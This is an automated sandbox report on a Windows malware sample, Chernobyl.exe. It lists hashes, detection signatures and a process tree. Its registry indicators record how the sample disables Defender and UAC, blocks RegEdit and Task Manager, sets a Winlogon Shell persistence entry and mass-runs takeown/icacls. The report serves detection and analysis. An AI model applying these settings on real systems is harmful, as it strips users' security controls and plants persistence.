Analysis
-
max time kernel
105s -
max time network
126s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-03-2024 01:27
Static task
static1
Behavioral task
behavioral1
Sample
Chernobyl.exe
Resource
win11-20240221-en
General
-
Target
Chernobyl.exe
-
Size
414KB
-
MD5
8c99a425507a8ae8b7500415a5796a3a
-
SHA1
ef5611557c6f940c6d298ad95fa93d12b9ce5283
-
SHA256
0739d74e9aeefc60155b664e4f715c75cac9826a89c0a7d5ff5b411a8f0f5998
-
SHA512
ff396af1dd9d221c36720252776db472270d3fd72ff868676092a897a9cab980547c80b99743b5e0390d0b7c4dc7b52759f322b7b4fcf3fb3d1065593e01f4fa
-
SSDEEP
6144:H7byZRo02222222222222222222222222222222222222222222222222222222E:1tH0HOZzv4TatsNqaJx
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/2256-0-0x000001EE9A9A0000-0x000001EE9AA0C000-memory.dmp disable_win_def -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Chernobyl.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 4736 takeown.exe 6840 takeown.exe 8844 2928 icacls.exe 7316 5532 icacls.exe 5872 icacls.exe 7424 5604 icacls.exe 6308 takeown.exe 5380 takeown.exe 5960 takeown.exe 6448 takeown.exe 6568 icacls.exe 6700 7500 7556 takeown.exe 5848 6336 8132 7560 7352 6776 6684 6536 icacls.exe 6676 takeown.exe 9092 3688 icacls.exe 6556 8620 8944 7116 takeown.exe 7072 icacls.exe 4508 6260 7788 8704 5828 takeown.exe 6540 icacls.exe 5452 takeown.exe 1532 6636 icacls.exe 6996 takeown.exe 896 takeown.exe 8108 7100 icacls.exe 6416 icacls.exe 7588 icacls.exe 9012 5936 takeown.exe 4508 takeown.exe 8852 7484 7108 takeown.exe 7076 7252 6844 8676 6068 icacls.exe 5500 takeown.exe 7928 takeown.exe 6644 icacls.exe 6560 takeown.exe 5348 icacls.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exepid process 6264 icacls.exe 7432 5960 icacls.exe 6072 icacls.exe 7968 5864 icacls.exe 5404 icacls.exe 6536 icacls.exe 6484 takeown.exe 5960 takeown.exe 2444 takeown.exe 5896 icacls.exe 6028 icacls.exe 7348 5532 icacls.exe 4952 takeown.exe 2320 takeown.exe 8436 7292 5756 icacls.exe 7724 8460 6012 takeown.exe 6872 takeown.exe 9012 5608 takeown.exe 5764 icacls.exe 8500 5980 7840 8672 8420 7136 takeown.exe 7112 icacls.exe 7920 icacls.exe 7484 7148 takeown.exe 8304 9016 8772 884 takeown.exe 7908 9068 6724 8248 7516 5976 takeown.exe 6804 takeown.exe 6664 takeown.exe 7992 8720 8264 8624 5616 icacls.exe 5040 icacls.exe 6616 takeown.exe 7280 7384 6156 icacls.exe 6256 takeown.exe 896 takeown.exe 7808 5716 takeown.exe 7100 icacls.exe -
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Chernobyl.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" Chernobyl.exe -
Drops file in System32 directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\System32\kill.ico Chernobyl.exe File opened for modification C:\Windows\System32\wallpaper.jpg Chernobyl.exe -
Drops file in Windows directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File created C:\Windows\cluttscape.exe Chernobyl.exe File opened for modification C:\Windows\cluttscape.exe Chernobyl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies File Icons 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons Chernobyl.exe -
Modifies registry class 48 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\inifile Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\inffile Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-2930051783-2551506282-3430162621-1000_Classes\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon Chernobyl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Chernobyl.exepid process 2256 Chernobyl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 2256 Chernobyl.exe Token: SeDebugPrivilege 2256 Chernobyl.exe Token: SeTakeOwnershipPrivilege 3852 takeown.exe Token: SeTakeOwnershipPrivilege 2340 takeown.exe Token: SeTakeOwnershipPrivilege 244 takeown.exe Token: SeTakeOwnershipPrivilege 4176 takeown.exe Token: SeTakeOwnershipPrivilege 4236 takeown.exe Token: SeTakeOwnershipPrivilege 4552 takeown.exe Token: SeTakeOwnershipPrivilege 3164 takeown.exe Token: SeTakeOwnershipPrivilege 2664 takeown.exe Token: SeTakeOwnershipPrivilege 2392 takeown.exe Token: SeTakeOwnershipPrivilege 2444 takeown.exe Token: SeTakeOwnershipPrivilege 2300 takeown.exe Token: SeTakeOwnershipPrivilege 1996 takeown.exe Token: SeTakeOwnershipPrivilege 5064 takeown.exe Token: SeTakeOwnershipPrivilege 3572 takeown.exe Token: SeTakeOwnershipPrivilege 2748 takeown.exe Token: SeTakeOwnershipPrivilege 2444 takeown.exe Token: SeTakeOwnershipPrivilege 2640 takeown.exe Token: SeTakeOwnershipPrivilege 1748 takeown.exe Token: SeTakeOwnershipPrivilege 3884 takeown.exe Token: SeTakeOwnershipPrivilege 1244 takeown.exe Token: SeTakeOwnershipPrivilege 2320 takeown.exe Token: SeTakeOwnershipPrivilege 3304 takeown.exe Token: SeTakeOwnershipPrivilege 4736 takeown.exe Token: SeTakeOwnershipPrivilege 3552 takeown.exe Token: SeTakeOwnershipPrivilege 5188 takeown.exe Token: SeTakeOwnershipPrivilege 5444 takeown.exe Token: SeTakeOwnershipPrivilege 5424 takeown.exe Token: SeTakeOwnershipPrivilege 5508 takeown.exe Token: SeTakeOwnershipPrivilege 5640 takeown.exe Token: SeTakeOwnershipPrivilege 5652 takeown.exe Token: SeTakeOwnershipPrivilege 5876 takeown.exe Token: SeTakeOwnershipPrivilege 5960 takeown.exe Token: SeTakeOwnershipPrivilege 6012 takeown.exe Token: SeTakeOwnershipPrivilege 6068 takeown.exe Token: SeTakeOwnershipPrivilege 5252 takeown.exe Token: SeTakeOwnershipPrivilege 5408 takeown.exe Token: SeTakeOwnershipPrivilege 1064 takeown.exe Token: SeTakeOwnershipPrivilege 5252 takeown.exe Token: SeTakeOwnershipPrivilege 5508 takeown.exe Token: SeTakeOwnershipPrivilege 5536 takeown.exe Token: SeTakeOwnershipPrivilege 5716 takeown.exe Token: SeTakeOwnershipPrivilege 5744 takeown.exe Token: SeTakeOwnershipPrivilege 5160 takeown.exe Token: SeTakeOwnershipPrivilege 3048 takeown.exe Token: SeTakeOwnershipPrivilege 6068 takeown.exe Token: SeTakeOwnershipPrivilege 5572 takeown.exe Token: SeTakeOwnershipPrivilege 5804 takeown.exe Token: SeTakeOwnershipPrivilege 5908 takeown.exe Token: SeTakeOwnershipPrivilege 5988 takeown.exe Token: SeTakeOwnershipPrivilege 6072 takeown.exe Token: SeTakeOwnershipPrivilege 5936 takeown.exe Token: SeTakeOwnershipPrivilege 5520 takeown.exe Token: SeTakeOwnershipPrivilege 5264 takeown.exe Token: SeTakeOwnershipPrivilege 5708 takeown.exe Token: SeTakeOwnershipPrivilege 5776 takeown.exe Token: SeTakeOwnershipPrivilege 5936 takeown.exe Token: SeTakeOwnershipPrivilege 5264 takeown.exe Token: SeTakeOwnershipPrivilege 5044 takeown.exe Token: SeTakeOwnershipPrivilege 4952 takeown.exe Token: SeTakeOwnershipPrivilege 2500 takeown.exe Token: SeTakeOwnershipPrivilege 5936 takeown.exe Token: SeTakeOwnershipPrivilege 5424 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2256 wrote to memory of 4728 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 4728 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 2548 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 2548 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 720 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 720 2256 Chernobyl.exe cmd.exe PID 2548 wrote to memory of 4512 2548 cmd.exe rundll32.exe PID 2548 wrote to memory of 4512 2548 cmd.exe rundll32.exe PID 2256 wrote to memory of 3028 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 3028 2256 Chernobyl.exe cmd.exe PID 4728 wrote to memory of 4556 4728 cmd.exe rundll32.exe PID 4728 wrote to memory of 4556 4728 cmd.exe rundll32.exe PID 720 wrote to memory of 3292 720 cmd.exe rundll32.exe PID 720 wrote to memory of 3292 720 cmd.exe rundll32.exe PID 2256 wrote to memory of 3888 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 3888 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 3256 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 3256 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 1888 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 1888 2256 Chernobyl.exe cmd.exe PID 3028 wrote to memory of 1612 3028 cmd.exe rundll32.exe PID 3028 wrote to memory of 1612 3028 cmd.exe rundll32.exe PID 3256 wrote to memory of 1440 3256 cmd.exe rundll32.exe PID 3256 wrote to memory of 1440 3256 cmd.exe rundll32.exe PID 2256 wrote to memory of 3444 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 3444 2256 Chernobyl.exe cmd.exe PID 3888 wrote to memory of 2160 3888 cmd.exe rundll32.exe PID 3888 wrote to memory of 2160 3888 cmd.exe rundll32.exe PID 2256 wrote to memory of 1284 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 1284 2256 Chernobyl.exe cmd.exe PID 1888 wrote to memory of 1312 1888 cmd.exe rundll32.exe PID 1888 wrote to memory of 1312 1888 cmd.exe rundll32.exe PID 3444 wrote to memory of 3884 3444 cmd.exe rundll32.exe PID 3444 wrote to memory of 3884 3444 cmd.exe rundll32.exe PID 2256 wrote to memory of 3088 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 3088 2256 Chernobyl.exe cmd.exe PID 1284 wrote to memory of 788 1284 cmd.exe rundll32.exe PID 1284 wrote to memory of 788 1284 cmd.exe rundll32.exe PID 2256 wrote to memory of 1616 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 1616 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 1736 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 1736 2256 Chernobyl.exe cmd.exe PID 3088 wrote to memory of 1388 3088 cmd.exe rundll32.exe PID 3088 wrote to memory of 1388 3088 cmd.exe rundll32.exe PID 2256 wrote to memory of 916 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 916 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 4852 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 4852 2256 Chernobyl.exe cmd.exe PID 1616 wrote to memory of 4592 1616 cmd.exe rundll32.exe PID 1616 wrote to memory of 4592 1616 cmd.exe rundll32.exe PID 1736 wrote to memory of 4784 1736 cmd.exe rundll32.exe PID 1736 wrote to memory of 4784 1736 cmd.exe rundll32.exe PID 2256 wrote to memory of 2692 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 2692 2256 Chernobyl.exe cmd.exe PID 916 wrote to memory of 4756 916 cmd.exe rundll32.exe PID 916 wrote to memory of 4756 916 cmd.exe rundll32.exe PID 2256 wrote to memory of 232 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 232 2256 Chernobyl.exe cmd.exe PID 4852 wrote to memory of 336 4852 cmd.exe rundll32.exe PID 4852 wrote to memory of 336 4852 cmd.exe rundll32.exe PID 2256 wrote to memory of 4968 2256 Chernobyl.exe cmd.exe PID 2256 wrote to memory of 4968 2256 Chernobyl.exe cmd.exe PID 2692 wrote to memory of 2352 2692 cmd.exe rundll32.exe PID 2692 wrote to memory of 2352 2692 cmd.exe rundll32.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies File Icons
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:4756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:232
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:4968
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3856
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3316
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3368
-
-
-
